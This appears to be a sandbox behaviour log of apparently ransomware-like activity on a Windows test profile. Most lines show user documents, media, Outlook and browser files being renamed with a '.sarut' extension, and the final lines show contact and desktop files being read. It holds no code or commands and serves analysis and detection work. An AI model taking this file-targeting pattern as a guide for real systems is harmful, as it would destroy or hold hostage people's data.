Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\UTVyOlBsO.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\UTVyOlBsO.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\WEpp.ppt.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\WEpp.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\x29MLGrvh.pptx.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\x29MLGrvh.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\0sb N ZRL9SdkEk.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\0sb N ZRL9SdkEk.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\1rcxkwS-WVFCcNTFOvBu.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\1rcxkwS-WVFCcNTFOvBu.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\4qxq GBI03hb94VB1Bxh.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\4qxq GBI03hb94VB1Bxh.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\5Ek2Ncsbu3-Kn69J_.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\5Ek2Ncsbu3-Kn69J_.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\8goXTx lf4qln.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\8goXTx lf4qln.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\9UqmwCjaFzvC9hxQ_Hzm.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\9UqmwCjaFzvC9hxQ_Hzm.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\aqCrbf.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\aqCrbf.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\BH6aDwcoogn.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\BH6aDwcoogn.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\E5BUqHk2HLgOe.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\E5BUqHk2HLgOe.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\iD-nB 21AVlDXuyQt.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\iD-nB 21AVlDXuyQt.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\jqJvbR_QvwlZ.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\jqJvbR_QvwlZ.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\L9aKE_qa0wpEDQP.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\L9aKE_qa0wpEDQP.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\ML2ljwZwYxgt.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\ML2ljwZwYxgt.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\oaN8Ym.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\oaN8Ym.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\P r09cK6te2.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\P r09cK6te2.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\T4bMO1.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\T4bMO1.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\twx8so6utmD0rym.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\twx8so6utmD0rym.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\yYv0O.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\yYv0O.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\DWu1l-Y.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\DWu1l-Y.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\jTQEcsS48yYmNAYPg-C.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\jTQEcsS48yYmNAYPg-C.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\oi_ITTR8-wThmdlbwB.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\oi_ITTR8-wThmdlbwB.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Oy-L7Z_7HHJqNjbRbhn.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Oy-L7Z_7HHJqNjbRbhn.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Tkrayns.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Tkrayns.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Wq-pSl9brlP45GOmX.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Wq-pSl9brlP45GOmX.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\XOHwMSl dhcUZR2jE3dY.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\XOHwMSl dhcUZR2jE3dY.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\YzSNWGeNkq7FltH72B.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\YzSNWGeNkq7FltH72B.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\5l6On7s_t7GucX53.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\5l6On7s_t7GucX53.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\60yrjxUg Vj9.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\60yrjxUg Vj9.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\gwGJ_.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\gwGJ_.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HAIVHenLu6VmrRA9qdSL.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HAIVHenLu6VmrRA9qdSL.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HsIk z MzQTD.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HsIk z MzQTD.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\Qwgdm9P2yFX8.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\Qwgdm9P2yFX8.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\ROFZyVd380HDxuGO Th.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\ROFZyVd380HDxuGO Th.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\wg6gkYjub7md9I.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\wg6gkYjub7md9I.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\zZtwi8cLkIz2TYu9.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\zZtwi8cLkIz2TYu9.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\95A_eDslLCP1_cxOmp.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\95A_eDslLCP1_cxOmp.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\a4C0Db hej9s3eMTL.m4a.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\a4C0Db hej9s3eMTL.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\AeGLUfnT 5mkX0jwT7I.avi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\AeGLUfnT 5mkX0jwT7I.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\blPbdb.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\blPbdb.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\FuG6Li hHaoR.wav.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\FuG6Li hHaoR.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\OaWM3OsWAcMsAPmjtMp.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\OaWM3OsWAcMsAPmjtMp.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\sySoZPGd3WyY2p8FSZlL.csv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\sySoZPGd3WyY2p8FSZlL.csv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\V8Vbr5d9qBcwJea.mp4.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\V8Vbr5d9qBcwJea.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\zNCu.odp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\zNCu.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\8yd_-EOXVhtdOvzi yYD.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\8yd_-EOXVhtdOvzi yYD.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\jiyYQcsk0aKO.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\jiyYQcsk0aKO.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\U LJ9GkFn_ZZk5OYhw-.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\U LJ9GkFn_ZZk5OYhw-.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\VOisP_2QkSl3ZoB7yjo.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\VOisP_2QkSl3ZoB7yjo.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\WaWTw-qe_8kdov2ReXE.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\WaWTw-qe_8kdov2ReXE.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\wso4Uc9Jo_0.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\wso4Uc9Jo_0.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\3LXSiPCs.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\3LXSiPCs.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\arfQt1VvAj.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\arfQt1VvAj.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\mdD0aXVF0dK25EdF.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\mdD0aXVF0dK25EdF.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\NI9HSi svXDo.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\NI9HSi svXDo.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\Wa jATnjlZIHpQ.bmp.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\Wa jATnjlZIHpQ.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\0 hjFn64gP.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\0 hjFn64gP.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\5SOK8nzJPtO5w6tJww.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\5SOK8nzJPtO5w6tJww.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\dSMvKtmHiWH 1Bu.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\dSMvKtmHiWH 1Bu.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\eLYk8XmS1.gif.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\eLYk8XmS1.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\pXiB_A.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\pXiB_A.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\y5xwn1F.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\y5xwn1F.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\YJEie6a3AkLk83C8Lu.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\YJEie6a3AkLk83C8Lu.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\zk2UII3QYbHa4.jpg.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\zk2UII3QYbHa4.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\fQmlW2dWeShgkpqPW.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\fQmlW2dWeShgkpqPW.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\HEQ_cwY6PJg1oZNA5e.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\HEQ_cwY6PJg1oZNA5e.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	1	Fn
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	size = 153605, size_out = 1178	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	size = 153605, size_out = 68382	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	size = 153605, size_out = 1171	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	size = 153605, size_out = 1177	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	size = 153605, size_out = 1174	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	size = 153605, size_out = 1172	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2l ht.rtf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2l ht.rtf	size = 153605, size_out = 67106	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\496tLHemB5Lzkb7xCb7M.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\496tLHemB5Lzkb7xCb7M.mkv	size = 153605, size_out = 6691	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bljvKKc.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bljvKKc.mp3	size = 153605, size_out = 100108	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bWkYr4TM2TfL3vpMnJ.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bWkYr4TM2TfL3vpMnJ.doc	size = 153605, size_out = 20387	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c6jIP57RiiMG8.ods	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c6jIP57RiiMG8.ods	size = 153605, size_out = 57817	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CFtrxYI4ehxro.doc	size = 38, size_out = 38	1	Fn Data
